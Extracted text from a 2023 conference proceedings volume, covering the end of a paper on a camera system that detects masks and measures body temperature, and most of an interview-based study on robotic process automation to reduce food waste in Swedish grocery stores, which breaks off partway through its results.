(Ed.): FICC 2023, LNNS 652, pp. 862–874, 2023. https://doi.org/10.1007/978-3-031-28073-3_57
Device for People Detection and Tracking Using Combined Color
863
immediately upon detection to specialist personnel and/or the suspected virus infected person depending on the configuration. The main assumption for the developed device was that the whole solution would work independently without the need for Internet access, allowing for use in any place, including specialist protection zones and places with difficult radio communication. An element of the developed solution is also a reporting system that enables automatic generation of daily and long-term reports on registered infections, in order to enable daily control of the situation, follow the dynamics of events and make responsible decisions based on the data. The device is intuitive and requires no operator training. The software interface and audio messages will be configurable in any language. During research, authors assumed the following medical assumptions of system operation: Infection with a novel coronavirus (SARS-CoV-2) leads to severe pneumonia and this in turn, in some cases leads to severe acute respiratory distress syndrome (ARDS) and multi-organ failure. Since the first sign of viral infection is a body temperature above 38◦ , it is recognized that measuring body temperature is one of the best, cheapest and fastest ways to identify potentially infected individuals. However, measuring the body temperature of a potentially infected person carries the risk of infecting the person taking the measurement, because currently the largest distance from which a reliable measurement can be made does not exceed 30 cm. Therefore, persons performing the measurements are forced to use the same personal protective equipment as if they were dealing with infected persons. The proposed System enables non-contact screening measurements in crowded public places, which will help to detect persons with potential fever and cough, will help to contain or limit the spread of the virus by early identification of infected persons. The camera is constructed in such a way that each can be a server or client. The server has a unique IP address that all other cameras can connect to.
2
Literature Review
The proposed covid camera solution will enable non-contact and continuous monitoring and reliable detection using artificial intelligence algorithms based on deep learning. The developed technology is not a one-off, because after the end of the COVID-19 pandemic the solution will be possible, after minor modifications, to be used for early detection of the threat of, among others, coronaviruses, Ebola virus, SARS and Zika. The system in operation will perform automatic analyses of recorded data in near real time (not less 10 Hz), i.e. without the need to create measurement queues, and it is also equipped with an alarm module that immediately informs specialist personnel about the detection of a person at risk of infection.
864
P. Woronow et al.
The above functionalities will work perfectly in the following identified units in the country: 976 Hospitals, 12 Civil Airports, 3511 km of borders. In the past year 241.7 thousand Cultural Events that gathered 34 million people including concerts and sporting events, 5 Ports, 578 Railway Stations, 87 Prisons, 24000 Schools, 563 Shopping Centers, 429 Universities, Military facilities as well as abroad. The project identified the following specific objectives: – development of body temperature measurement technology operating from at least 2 m with a frequency of not less 10 Hz, – development of an alarm module, – development of an artificial intelligence module for the analysis of video streams from the sensory system, – development of a wireless communication module, – development of a inertial module, – development of a data collection module [10], – development of a mobile application for specialist personnel, – development of a contact less disinfectant dispenser, – development of a reporting module, – integration of the above technologies into a single system operating without the need for Internet access. For each of the above areas, a literature review and existing solutions were conducted. However, due to text length limitations, the most relevant scope has been presented in an aggregated and concise manner in this article. Covid camera is a research project aimed at checking whether a person staying among people in a closed room does not pose a threat to others resulting from not wearing a mask or high temperature. To realize the project, it was necessary to get acquainted with convolutional neural networks, stereo vision and a thermal camera. 2.1
Human Detection and Wearing Mask
In the world of artificial intelligence and image processing, there are many architectures that detect an object in an image, and the most popular ones include: – – – –
Yolov4, SDD, R-CNN, and many others.
Device for People Detection and Tracking Using Combined Color
865
Fig. 1. Object detector [5]
This number continues to grow with the growing popularity of Deep Learning. The project proposed a CNN architecture for human detection and mask wearing based on the Yolov4 architecture [5] (Fig. 1). To detect people in the image as efficiently as possible, the COCO dataset [8] was used to train a neural network containing a large number images of people. To detect whether a person is wearing a mask or not, it was necessary to prepare a dataset containing pictures of both detection groups. The final number of photos used to train the network was 1,900. The project assumes a camera performance of 10 fps, so to increase network performance it was necessary to switch to the TensoRT architecture, because according to article [6], the tensorRT architecture is more efficient than the regular Cudnn library on nvidi Jetson Xavier (Fig. 2). The entire neural network was based on the open-source Pytorch framework, therefore the ONNX format was used to move from one architecture to the other.
Fig. 2. Nvidia tensorRT [3]
866
P. Woronow et al.
2.2
Tracking Humans
Merely detecting in an image whether or not a person is wearing a mask was not enough as each detection of a person was archived in the database. Therefore, in order to avoid the excessive number of photos of the same person, an algorithm for tracking people was developed based on the articles [7,11]. In short, Deepsort connects the same people in the detected frames using a Kalman filter and a trained CNN model based on the MOT16 dataset [9]. 2.3
Camera RGB-D
The RGB-D camera provides information not only about the color, but also the depth of the image, which is extremely important because it allows the indication of a person on a thermal camera using simple algebraic transformations based on stereovision. To increase the measurements efficiency of temperature, it is necessary to increase the accuracy of the depth map. The selected depth camera provides a depth error of average 2% at 4 m [1]. The designed covid camera consists of two IR cameras, one RGB camera and a laser. The depth map is determined on the basis of two IR cameras calibrated with each other. The laser in the camera provides greater precision in determining the depth map, and the RGB camera provides color information. 2.4
Thermal Camera
The Optris PI 640i camera was used to measure the temperature due to its resolution and accuracy. “The thermal imager optris PI 640i is the smallest measuring VGA infrared camera worldwide. With an optical resolution of 640 × 480 pixels, the PI 640i delivers pin-sharp radiometric pictures and videos in real time” [2]. 2.5
Calibration
In order to determine a new position on the thermal imaging camera based on the pixel position of the RGB camera, it is necessary to define the internal parameters of the cameras: – focal length fx , fy , – radial distortion and tangential distortion k1 , k2 , k3 , p1 , p2 , – optical centers cx , cy . The process of moving pixel locations from one camera to another is as follows: – moving the pixel to the world coordinate system, using the camera’s internal parameters and depth information,
Device for People Detection and Tracking Using Combined Color
867
– multiplying a 3D point by a rotation R and translation T matrix, – and the transition from the world coordinate system to the local coordinate system, using the internal parameters of the second camera. R and T are rotation and translation which describe the relative position of both cameras. To determine the above parameters for thermal camera, the OpenCV library and a checkerboard pattern covered with an infrared reflective material were used (Fig. 3).
Fig. 3. Sample photo from the created calibration set
⎤ ⎡ 382.79 0 315.8 mtxT hermal = ⎣ 0 411.65 238.06⎦ 0 0 1 distT hemral = −0.2034 0.1364 0 0 −0.0598 ⎡ ⎤ 0.9997 0.0185 0.0172 R = ⎣−0.0186 0.9998 0.004 ⎦ −0.0171 −0.0044 0.9998 ⎡ ⎤ 10.85 T = ⎣−80.74 ⎦ 1.3568
(1) (2) (3)
(4)
The parameters for the RGB-D camera have been set by the manufacturer and are as follows: ⎡ ⎤ 386.125 0 323.81 386.125 239.258⎦ (5) RGBT hermal = ⎣ 0 0 0 1
868
P. Woronow et al.
where the above matrices represent the following formula: ⎤ ⎡ fx 0 cx mtx = ⎣ 0 fy cy ⎦ 0 0 1 dist = k1 k2 p1 p2 k3
3
(6)
(7)
Functional Results
At the beginning of the process, the person is detected on the basis of the image read from the RGB-D camera with a resolution of 640 × 480 (the resolution was chosen due to the resolution of the thermal imager for easier calibration and transfer of pixel positions). Then, a unique number is assigned to each tracked person based on the developed Deepsort algorithm [11]. Taking advantage of the fact that each tracked person has a unique number, we can assign parameters such as: – information about wearing a mask, – information about temperature. In order to assign a value to the above parameters, it is necessary to run the model for head detection on each acquired frame. Unfortunately, the detection of a person and detection of the head are two unrelated detections. Therefore an algorithm was developed to match the found heads to people. The algorithm checks what percentage of the upper human detection coincides with the head detection, see Fig. 4. However, even if the model locates the human head well, it still has a classification error. Therefore, a condition was added to increase the precision: if the prediction repeats five times, it will be assigned to the tracked person. Figure 5 shows the result of the prediction, where we see people with the label ’None’ is a person who has not been assigned to any group.
Fig. 4. Comparing mask field of detection with human field of detection
Device for People Detection and Tracking Using Combined Color
869
Fig. 5. Result of the algorithm for assigning a mask to the tracked person
At the same time, all pixel locations pointing to the detected person’s head are transmitted to the thermal camera, using internal parameters, depth map information, rotation matrix and translation matrix. Finally, the median of each detection area is calculated to filter out all temperature limits, and then the arithmetic mean of the five successive temperatures of the same person is calculated. If the tracked person has been assigned a label and temperature, the data is packaged and sent to the server.
4
Solution Architecture
The diagram below (Fig. 6) shows step by step how the algorithm works, starting with reading the frames, going through the algorithms for detecting people, masks, measuring temperature, and ending with saving data on the server.
870
P. Woronow et al.
Fig. 6. Image processing flow diagram of the designed covid camera
Device for People Detection and Tracking Using Combined Color
5
871
Test Results
In order to verify the functionality of the camera, it was tested for 24 h in real conditions, in the busiest place in the cooperating company. It was assumed during the research that people coming to work are healthy and do not have elevated temperatures. For the purposes of the study, some subjects wore a mask and some did not. The task of the algorithm was to detect the person and then measure the temperature and count people with and without masks (Tables 1 and 2). Table 1. The results of people who did not wear the mask Label
Probability Temperature
Without mask 68.22
33.18 ◦ C
Without mask 69.82
31.75 ◦ C
Without mask 86.04
33.45 ◦ C
Without mask 96.83
33 ◦ C
Without mask 97.66
33.68 ◦ C
Without mask 64.69
32.38 ◦ C
Without mask 68.8
33.02 ◦ C
Without mask 76.78
31.88 ◦ C
Without mask 93.34
31.63 ◦ C
With mask
59.17
33.48 ◦ C
With mask
60.64
32.87 ◦ C
Without mask 87.12
32.53 ◦ C
Without mask 63.75
32.17 ◦ C
With mask
31.9 ◦ C
58.97
Without mask 93.99
32.78 ◦ C
With mask
33.23 ◦ C
66.48
Table 2. Test result for 100 people who did not wear a mask Total number of people With mask Without mask 100
9
91
872
P. Woronow et al. Table 3. Selected results from tests in real life conditions Information Temperature: 32.7◦ C Label: without mask
probability 68.26% Temperature: 32.9◦ C Label: without mask
probability 62.3% Temperature: 33◦ C Label: with mask
probability 85.54% Temperature: 32.88◦ C Label: without mask
probability 95.95% Temperature: 32.88◦ C Label: with mask
probability 97% Temperature: 32.92◦ C Label: without mask
probability 67.3% Temperature: 33.18◦ C Label: without mask
probability 98%
RGB
Thermal
Device for People Detection and Tracking Using Combined Color
6
873
Conclusions
The presented results of research and development project aimed at supporting the work of a security guard by indicating possible threats resulting from increased human temperature or not wearing a mask. The developed solution does not require access to the Internet for operation so it can be used anywhere. The Covid Camera is designed to automate the process of measuring temperature and verifying that a person is wearing a mask. After performing tests in real conditions (Table 3) there is a conclusion that the camera thus fulfills its function as it is able to detect whether a person is wearing a mask, measure the temperature of the person and send detected events to the server. The acquired results are promising and useful for practical application. The labeling error is acceptable as it depends on the size of the training set which will be increased in the future to increase precision. The temperature measurement error is hardware related and can be changed by adding a black body in the field of view of the camera. According to the manufacturer, this error will drop from 2◦ to 0.5, which is an appropriate error to check if a person has a fever. It is worth noting that the solution was tested in real conditions in cooperation with the hospital CSK MSWiA. In the future the proposed covid camera might be used by UAVs for outdoor analysis [4]. Acknowledgment. This work has been supported by National Centre for Research and Development as a project ID: DOB-BIO10/19/02/2020 “Development of a modern patient management model in a life-threatening condition based on self-learning algorithmization of decision-making processes and analysis of data from therapeutic processes”.
References 1. 2. 3. 4.
Intel realsense d455 Optris pi 640i Tensorrt Bieda, R., Jaskot, K., Jedrasiak, K., Nawrat, A.: Recognition and location of objects in the visual field of a UAV vision system. In: Nawrat, A., Kus, Z. (eds.) Vision Based Systemsfor UAV Applications. Studies in Computational Intelligence, vol. 481, pp. 27–45. Springer, Heidelberg (2013). https://doi.org/10.1007/978-3319-00369-6 2 5. Bochkovskiy, A., Wang, C.Y., Liao, H.Y.M.: Yolov4: optimal speed and accuracy of object detection. CoRR, abs/2004.10934 (2020) 6. Franklin, D.: Nvidia tensorrt delivers twice the deep learning inference for gpus & jetson tx 7. Josinski, H., Switonski, A., Jedrasiak, K., Kostrzewa, D.: Human identification based on tensor representation of the gait motion capture data. IAENG Trans. Electr. Eng. 1, 111–122 (2013)
874
P. Woronow et al.
8. Lin, T.-Y., et al.: Microsoft COCO: common objects in context. In: Fleet, D., Pajdla, T., Schiele, B., Tuytelaars, T. (eds.) ECCV 2014. LNCS, vol. 8693, pp. 740– 755. Springer, Cham (2014). cite arxiv:1405.0312Comment: 1) updated annotation pipeline description and figures; 2) added new section describing datasets splits; 3) updated author list. https://doi.org/10.1007/978-3-319-10602-1 48 9. Milan, A., Leal-Taixe, L., Reid, I., Roth, S., Schindler, K.: MOT16: a benchmark for multi-object tracking. CoRR, abs/1603.00831 (2016) 10. Nawrat, A., Jedrasiak, K., Daniec, K., Koteras, R.: Inertial navigation systems and its practical applications. New approach of indoor and outdoor localization systems (2012) 11. Wojke, N., Bewley, A., Paulus, D.: Simple online and realtime tracking with a deep association metric. CoRR, abs/1703.07402 (2017)
Robotic Process Automation for Reducing Food Wastage in Swedish Grocery Stores Linus Leffler, Niclas Johansson Bräck, and Workneh Yilma Ayele(B) Department of Computer Systems and Sciences, Stockholm University, Stockholm, Sweden [email protected]
Abstract. In the wake of global warming and ever-increasing conflicts and instabilities for controlling resources and interests hampering agricultural development, food security has been the main priority of nations. Besides, food wastage is a global issue that has become more serious. For example, the Food and Agriculture Organization (FAO) of the United Nations reports that it aims to reduce global food wastage in production, retail, and supply chain. In Sweden, roughly 100,000 tons of food is wasted every year due to the date of expiry in grocery stores, according to a government report published in 2020. On the other hand, Robotic Process Automation (RPA) can streamline the control of the expiring date of food, leading to less food wastage. Besides, disruptive technologies such as RPA are predicted to have an economic impact of nearly 6.7 trillion dollars by 2025. However, research on RPA or automation to manage food wastage still needs to be conducted as more needs to be done. Besides, research on the benefits and challenges needs to be done, and food wastage in Sweden is a serious issue that calls for stakeholders’ action. This research investigates the opportunities and challenges associated with using Robotic Process Automation (RPA) to reduce food wastage in Swedish grocery stores. Thus, we collected data from seven Swedish grocery store employees using semi-structured interviews. We applied thematic analysis to the collected data. The result shows several opportunities associated with using RPA in organizations for food wastage management in grocery stores. On the other hand, respondents fear losing jobs if RPA is implemented to manage food wastage. Keywords: Robotic process automation · RPA · Softbots · Food wastage management · Monotonous work tasks · Grocery stores · Food supply chain
1 Introduction According to World Food and Agriculture Organization (FAO1 ), approximately onethird of global food production is wasted annually. Thus, FAO set the 2030 Agenda for sustainable development, such as reducing food wastage. In Sweden, 30 000 to 100 000 tons of food is wasted in grocery stores [1]. In the wake of increased concerns for 1 https://www.fao.org/platform-food-loss-waste/flw-data/background/en/.
© The Author(s), under exclusive license to Springer Nature Switzerland AG 2023 K. Arai (Ed.): FICC 2023, LNNS 652, pp. 875–892, 2023. https://doi.org/10.1007/978-3-031-28073-3_58
876
L. Leffler et al.
global sustainable development, the Swedish Environmental Protection Agency (EPA2 ) proposed an urge to reduce food wastage by 20% per capita from 2020 to 2025. Also, EPA targets to increase food reusable packaging by 25% from 2022 to 2030. The main issue is controlling food wastage in grocery stores, as tons of food is wasted because of expiry dates. Grocery stores need to manage their inventory process better to reduce food wastage using expiry date information. Mullick et al. [2] argue that the use of digital platforms enables the reduction of food wastage. The interaction with digital platforms can be performed faster with better accuracy through Robotic Process Automation (RPA). RPA enables inventory control and management [3]. On the other hand, a prediction by McKinsey and Company indicates that RPA will have an impact of approximately 6.7 trillion dollars by 2025 [4]. A robotic software technology company, UiPath3 , defines RPA as a software technology that enables us to develop, deploy, and control software robots that we use to emulate office workers’ actions like robots, also referred to as softbots. RPA is not a system, and it does not replace information systems. Instead, RPA uses the same way we use systems to perform tasks on digital platforms, but it performs faster [3]. Besides, digitizing the food supply chain process and using RPA and IoT can help reduce food wastage in grocery stores [5]. However, RPA is a relatively new technology. Also, [5] argues that more needs to be known about collaboration on digital platforms to deal with food wastage issues. To the authors’ knowledge, using RPA to deal with food wastage in grocery stores in Sweden is under-researched. Besides, existing literature focuses more on the use of digitalization in general to reduce food wastage [5] and the use of RPA in the beef supply chain [6]. This research presents an empirical study about the possibilities of implementing RPA in grocery stores in Sweden to reduce food wastage. Therefore, we collected qualitative data using semi-structured interviews and did a thematic analysis to identify the benefits and the disadvantages of implementing RPA technology to help grocery stores in Sweden. This paper has five sections; Sect. 2 presents an overview of RPA and previous studies, Sect. 3 presents the research methodology, and the last two sections present the results and discussions, respectively.
2 Robotic Process Automation Robotic Process Automation (RPA), also known as Soft Robot, is a software technology that enables you to automate repetitive and simple tasks by emulating human interaction with a computer [7]. RPA does the work we do but faster with better accuracy [3]. We can generally categorize RPA into two major categories: attended and unattended, where attended RPA works with active human agents simultaneously. In contrast, unattended RPA works with no human intervention [7]. Using the “outside-in” method, which means the existing system is unchanged, RPA replaces people by mapping processes with the computer’s runtime and execution scripts using a control dashboard [8, p. 1]. 2 http://www.naturvardsverket.se/Miljoarbete-I-samhallet/Miljoarbete-I-Sverige/Regeringsupp
drag/Redovisade-2020/Forslag-till-tva-nya-etappmal-for-forebyggande-av-avfall/. 3 https://www.uipath.com/rpa/robotic-process-automation.
Robotic Process Automation for Reducing Food Wastage
877
Not all processes are suitable for RPA; processes that are suitable for RPA automation are illustrated in Fig. 1.
Fig. 1. Features of processes suitable for robotic process automation [3, p. 9]
RPA is used in several types of workflows or business process execution activities by mimicking human workers, as discussed above. One of these sectors is grocery stores, and a substantial of the work at the grocery stores is smaller and repetitive tasks. McAbee [9] suggests repetitive and smaller tasks should be automated to focus on more creative tasks. Besides, [3] states that RPA enables grocery stores to expedite their workflows by replacing human involvement with repetitive and monotonous tasks to streamline the control of the expiry data handling process, which will lead to reduced food wastage. 2.1 The History of RPA Automation, which is believed to be coined around the 1940s in the Ford motor company, originated from the Greek words autos and matos, to mean self and moving, respectively [10]. The introduction of computers and software systems were developed to manage tasks instead of executing those tasks on paper-based manual business processes. For example, bookkeeping, inventory management, and communications management are examples of processes that are now automated [11]. According to Uipath4 , “Robotic Process Automation” was introduced in the early 2000s; the technology was being developed before its introduction. According to [12], RPA 2.0, the next generation RPA, will be more powerful, having more AI features and empowering companies to encompass a larger digital workforce and employees closely working with the digital workforce. 2.2 Previous Studies This section presents an overview of previous studies from the literature. Also, previous studies about the advantages and challenges of adopting RPA are presented.
4 https://www.uipath.com/rpa/robotic-process-automation.
878
L. Leffler et al.
The Advantages of Adopting RPA. There are several reasons why companies adopt RPA; see Fig. 2 for the advantages of adopting RPA. For example, [13] analyzed case studies about the adoption of RPAs and concluded that the reason for adopting RPAs is reducing human error and costs. Besides, RPAs are implemented without introducing change to existing information, without requiring re-engineering of the existing system, and saving up to 55% cost for rule-based processes [3].
Fig. 2. Benefits of RPA implementation in enterprises [3, p. 10]
The Challenges of Using RPA. The disadvantages we found from the literature are related to the nature of the process, implementation issues, and employee concerns. The challenges are: • Human involvement is essential as a fully automated supply chain is impossible because front-office activities such as managing customer relationships and developing strategic plans for the supply network are human-dependent. However, most back-office activities in the supply chain are suitable for automation [3]. • A significant drawback of RPA is the fear of humans not being needed if a robot can perform the process faster and more consistently. The fear is that robots will replace humans in the future. However, RPA is not a cognitive solution for computer-driven processes. It cannot learn from experiences and is only used to mimic how a human would perform a task in usual routines [12]. • Implementing RPA in a highly complex process is a common mistake that results in high automation costs. The time and effort could have been spent automating multiple processes instead. It is more efficient to tackle more complex processes once
Robotic Process Automation for Reducing Food Wastage
879
a better understanding of RPA methodology has been created since processes of low or medium complexity levels are more suitable for RPA. • Another area for improvement is if the company tries to eliminate human input from a process, which ends up in additional cost or a delay in benefits. However, the savings are reduced by using no effort in changing existing processes and allowing RPA to work as much as possible within a process. It is essential to find a balance by allowing human input where it is needed while simultaneously automating as much of the process as possible. A good target is to automate about 70% of a process and leave the remaining 30% to human interaction [14]. 2.3 Related Studies in Food Wastage Reduction: Previous Studies Focus on the Theoretical Aspects, Such as the Usability of RPA in the Supply Chain, Although Very Few. Related Studies Are • Annosi et al. [5] conducted an empirical study about collaboration practices that actors in the digital food supply chain adopt to solve problems such as food waste. This study indicates that digitization through RPA and IoT can help reduce food wastage in food supply chains. Annosi et al. [5] used eighteen semi-structured interviews. The identified food wastage reduction in the supply chain is the implementation of government regulations and strategies for food wastage reduction, educating consumers, and improving supply chain processes. • Mullick et al. [2] investigated how food wastage reduction can be achieved through digital platforms, but RPA is not considered in this study. The study involved collecting data involving food wastage from digital platforms, such as calculating near-expiration discounts and measuring the number of consumers who viewed the near-expired products. • Mungla [3] investigated RPA for inventory control and management for freight forwarders. This article does not present any application of RPA food waste reduction. However, the lessons learned about using RPA in inventory control management could be used for grocery stores even though the nature of the products kept at grocery stores is different for general commodities. • Finally, after we completed our study, we found out that a new article by [15] about the application of Artificial Intelligence (AI) to help reduce food wastage in grocery stores was published in the conference publication channel the Association of Information System. The article’s focus [15] is to use machine learning to predict the demand for food items so that production planning is optimized and food wastage reduction can be achieved. This article is interesting; however, predictions for future demands of food are not always determined by grocery store data but could be affected by several external factors. For example, the prediction for own branded food production by [15] could be affected by surplus production and supply of similar food item production in other companies, market competition, and other marketing disruptions.
3 Methodology Denscombe [16] argues that a strategy is a plan of action designed to achieve a specific goal. This study aims to identify the advantages and disadvantages of using RPA
880
L. Leffler et al.
technology in Swedish grocery stores to help reduce food wastage. To meet this aim, we surveyed to collect qualitative data using semi-structured interviews about the use of RPA in Swedish grocery stores. We applied a thematic analysis to identify the benefits and the disadvantages of implementing RPA technology to help grocery stores in Sweden. According to [16], no research strategy is suitable for all kinds of research problems. Thus, [16] suggests that the researcher should ask if the strategy is suitable, feasible and ethical to find the most suitable research strategy. A survey enables researchers to seek valuable information from relevant respondents and undertake empirical research by enabling them to investigate a certain phenomenon in depth through close inspections [17]. An alternative research strategy is a case study or case studies. One of the strengths of a case study approach is that it allows the researcher to use various sources, data, and research methods in the study. The case study approach is most suitable when the researcher wants to study an issue with more depth and explain the complexity and subtlety of problems in real-life situations [16]. We chose a survey instead of a case study because of time because case studies demand a long time considerably. Besides, surveys are more suitable for understanding a carefully sampled population. 3.1 Methods for Data Collection This study used semi-structured interviews as a data collection method. Denscombe [16] argue that to gain information about respondents’ experiences and personal opinions interview is a better choice than a questionnaire. We used purposive sampling to select six respondents who have experience working in grocery stores. W used purposive sampling to select respondents who already knew the subject of investigation, that is, the workflows of the grocery store. We conducted the interviews by letting the respondents have enough time to give insight into their workflows and thoughts regarding the questions that were asked without getting sidetracked to a point where the individual interviews differed too much in time. Table 1 lists and describes the respondents that participated in this study. Most of the respondents work at the largest grocery stores in Sweden with approximately 92 million SEK in revenue. Table 1. Description of respondents with anonymous representation of R1 to R6 Respondents alias
Role
Interview date
R1
Front-office and check out
01-06-2021
R2
Fresh products department
07-06-2021
R3
Front-office and check out
11-06-2021
R4
Fruit department
24-06-2021
R5
Front office and sales
30-06-2021
R6
Front office and check out
17-07-2021
Robotic Process Automation for Reducing Food Wastage
881
3.2 Thematic Analysis Thematic analysis is suitable for qualitative data analysis by identifying, analyzing, and interpreting thematic patterns within the collected [18]. We used thematic analysis for generating codes and identifying themes, as suggested by [18]. We followed the six steps of thematic analysis as described by [18], and the six steps followed are: Step 1: Familiarizing with Data: We transcribed the collected audio interview data, did reading and re-reading of the collected data, and noted down initial ideas. Step 2: Generating Initial Codes: As the investigation to find the cons and pros of using RPA in grocery stores, the codes are based on pre-identified themes. Thus, the thematic analysis follows a deductive approach. We systematically coded interesting features of the data across the entire data set, followed by collating data relevant to each code by highlighting with color code as illustrated in Fig. 4 and 6. Step 3: Searching for Themes: After generating initial codes in the previous step, we collated codes into potential themes. Step 4: Reviewing Themes: This step includes checking if the themes relate to the coded extracts, see Fig. 4 and 6. And the entire dataset and generating a thematic analysis map, as illustrated in Fig. 3. Step 5: Defining and Naming Themes: This step refers to ongoing analysis to refine the specifics of each theme, and the overall story to analysis tells, and write clear definitions and names for each theme. In this step, the final thematic map is created, as illustrated in Fig. 5. Step 6: Producing the Report: This is the final step of the analysis. This step involves the articulation of explicit, clear extract examples, the final analysis of selected extracts relating to the analysis of the research question and literature, and producing a scholarly report of the analysis.
Fig. 3. Initial map of thematic themes
The initial thematic map remained roughly identical throughout the analysis. However, initial themes were either too vague or unnecessarily separated, creating redundancy. The Work theme became bloated with too many sub-themes, and the Pros
882
L. Leffler et al.
and Cons themes included RPA as a sub-theme. The thematic map was enhanced by introducing themes such as “Work tasks,” “RPA,” and “Current issues with tasks”.
Fig. 4. Snapshot of extracted data and initial themes added to the code
Fig. 5. Developed map of thematic maps
The final thematic map consists of four main themes and two sub-themes for each theme, see Fig. 5. The four themes are discussed below: • Work - this theme is important, and we get interesting information regarding workrelated themes. Our extracted information indicates that food expiration depends on the type of food items each department manages. The expiration of dairy products is different from other food types. • RPA - contain two sub-themes, namely, pros and cons. This theme directly relates to the research goal as we are tasked to identify the advantages and challenges of adopting RPAs in grocery stores. • Work tasks contain two sub-themes: food wastage and the current system. Food wastage is about how employees manage food waste. Also, the current systems theme enabled us to capture information regarding current automation to deal with food wastage. • Current systems - have two sub-themes, namely monotonous tasks and other tasks. This theme is created to capture information regarding repetitive tasks and how they are dealt with.
Robotic Process Automation for Reducing Food Wastage
883
Fig. 6. Snapshot of code from respondents segregated by color and placed in a table containing the relevant themes
3.3 Evaluation Methods We evaluated our thematic analysis and the results following the evaluation guidelines and steps explained by [19], the evaluation checklist includes: • Justified thematic analysis - this includes the examination of the thematic analysis’s consistency with the research questions and theoretical and conceptual underpinnings of the research. • Clear specific approach - we applied deductive thematic analysis where our initial major themes are predefined to reflect the research objects. We have cons to mean challenges and pros to mean advantages. • Evidence of problematic assumptions - we did not find any problematic assumptions. • Theoretical underpinning - we do not have theoretical underpinnings affecting the thematic analysis specified. • Own the perspective - to identify if the researchers own their perspective. We mainly focused on identifying the advantages and challenges of adopting RPA in grocery stores and did not have our assumptions. • Analytic procedures - identify if procedures are analytic and clearly outlined.
884
L. Leffler et al.
• Evidence of conceptual confusion - identify if there is any conceptual and procedural confusion. We did not encounter any theoretical confusion. The next steps from [18] are about evaluating the analysis, findings, and results. These steps are: • Clear themes - we used thematic maps, tables, and narrative descriptions to overview the thematic analysis. • Domain summaries - we used the collected data to create summaries of themes, evaluated the thematic analysis, and proposed future research directions. • Contextualizing information presented as a theme - check if non-thematic contextualizing information is presented as a theme. We presented quotations of respondents’ words to make sure to get all non-thematic information. • Actionable outcome - in applied research, see if the reported themes give rise to actionable outcomes. • Conceptual clashes - search if there are conceptual clashes and evidence of conceptual confusion in the paper. • Unconvincing analysis - the final step is to analyze if there is evidence of weak or unconvincing analysis.
4 Results and Analysis The majority of the participants in this study had a favorable view of implementing RPA in their workflow. There already exists small-scale automation in their current business processes. However, they are skeptical about how much automation could be used in these enterprises in the future and if the employees could be needed the same way they are today. In this section, the advantages and challenges of adopting RPA are presented. 4.1 Advantages and Challenges of Adopting RPA The advantages and challenges, referred to in this paper as pros and cons, are presented below. There are several advantages and skepticisms identified. The skepticism and additional thoughts from the respondents are discussed further in depth in the upcoming sections of this section. Table 2 briefly describes the pros and cons of RPA according to the respondents that participated in this study. 4.2 Advantages of Adopting RPA All respondents have a favorable observation about using RPA in the organization, yet two have fears, as explained in the next section. The majority agreed the adoption of RPA would enable them to have a less stressful work environment as RPAs replace monotonous tasks and they can focus on productivity. With better physical and mental health, the organization is working more efficiently and reducing the number of employees reporting sickness [20]. According to the respondents’ results, monotonous
Robotic Process Automation for Reducing Food Wastage
885
Table 2. Identified pros and cons (advantages and challenges) of adopting RPA Pros with RPA
Cons with RPA
1. More time for focusing on productivity (R1, R2, R3, R6) such as sales (R2) and enables employees to achieve productive work (R2) 2. Less stress for employees so it creates a healthy work environment (R1) 3. Simplify tasks for changing prices (R1, R2) 4. Cheap and easy to implement (R2) 5. It reduces the time it takes to check the date of expiry (R3) 6. It manages the workflow better (R4) 7. It enables stores to keep healthy food and creates more time to make the store look better in (R3) 8. Decreases the number of monotonous tasks (R5)
1. Human intervention is needed because RPAs are not fully developed to be fully AI solutions (R1, R2) 2. It costs to recruit an RPA specialist (R3) 3. Employees fear adopting it because they fear replacement (R3, R6) 4. RPAs could be affected by faults in data entry, cash register problems, and theft (R4). Theft is not automatically registered, as employees do not know what is missing. Thus manual counting and removal of damaged items should be done manually 5. Companies do not fully trust RPAs. For example, R5 claims that RPAs should be developed well before they are used, 6. It demands people learn how to use them (R6) 7. All tasks are not automated. Thus, identifying automated tasks and those needing human intervention needs an understanding of workflows and the system itself (R2) 8. Optimizing the balance between automated and manual tasks must be done (R2)
tasks harm employees’ health due to the monotonous tasks causing stress as they help customers and manage several tasks. “I believe that when you work in a grocery store, you should probably expect most things to be monotonous. But then I think there are monotonous tasks that can prevent us from providing even better service to customers. Every day is different and usually all routines are done step by step during the day, in parallel with helping customers. We spend too much time on things around us which means we usually do not get a good flow when we at the same time have to help customers. We rarely have time to focus on new things as well.” - R2. According to the respondent, implementation of RPA is easy and cheaper. Thus, we believe that despite their skepticism, they should try it. One of the respondents has almost 1300 stores in Sweden with approximately 92 million in revenue. “We are looking at comparing numbers from the previous year all the time and buy goods in a quantity based on that. That is something a system could handle, at least if it is goods stored in a central warehouse by [the enterprise] itself or large external suppliers like Scan. And since it does not seem to be so expensive and difficult to fix, I think [the company] would be interested in testing it or at least look at it more.” - R2.
886
L. Leffler et al.
Most respondents commented that adopting RPA in grocery stores enables reduced food wastage. A positive opinion about adopting technology leads to successful implementation. For example, [21] argues that small to medium size enterprises with staff who entertain disruption or introduce new technology indicate that companies will succeed. 4.3 Challenges of Adopting RPA Despite the advantage of RPAs in replacing monotonous tasks, employees fear losing their jobs to the digital workforce. “The drawbacks with RPA could be the price and cost. I do not know how much it would cost for the grocery store to implement it. It could be at the cost of the workforce meaning it could take over the employees. And if working behind the cash register would be the only task left, it could also be automated with self scanning registers and such.” - R3. “I think while automation can be good and really effective, it can also affect the working community. There could be fewer jobs I think. Tt will not always be perfect for all systems so you will still need system developers and people who will handle it. But if you do not have the knowledge of how much things can be improved with automation, you probably have an even stronger opinion than mine that there will be fewer jobs in the future because of it.” - R6. Automation can be affected by deviations due to system errors, theft, and cash register problems. “I think automation could facilitate the business but if any deviation occurs one day, a person could change the approach based on a specific problem. Not a system. That is the negative part about it.” - R1. “The system could be affected by certain things such as theft, cash register issues, and inputting the wrong values in the system. It is rare that our system is completely correct, above all, I do not believe there is an item that is the exact correct number in quantity in the store that the system says there is. There are too many factors that make the system give wrong information but in the bigger picture it facilitates the workflow.” - R4. Expiry date processing is tricky for certain types of foods, such as fruits and vegetables. For example, the expiry dates of such food types are affected by storage, transportation, climatic variations, and handling conditions that affect the shelf life of fruits and vegetables. “I think it is a great solution that most likely would be beneficial if it was added to our current systems since it would aid the workers by reducing simple and redundant tasks that involve a computer system. But I think the solution is not developed enough to handle situations that a computer might not be able to handle. In the fruit department, the goods can have different qualities based on their placement in the store, such as the storage space or in the store at the front. Fruits are time sensitive and if they are shipped to our store with the same delivery they could still be delivered at different times from the producer. That means the fruit could arrive in different qualities that only a human can handle. That is at least how it looks today.” - R5. 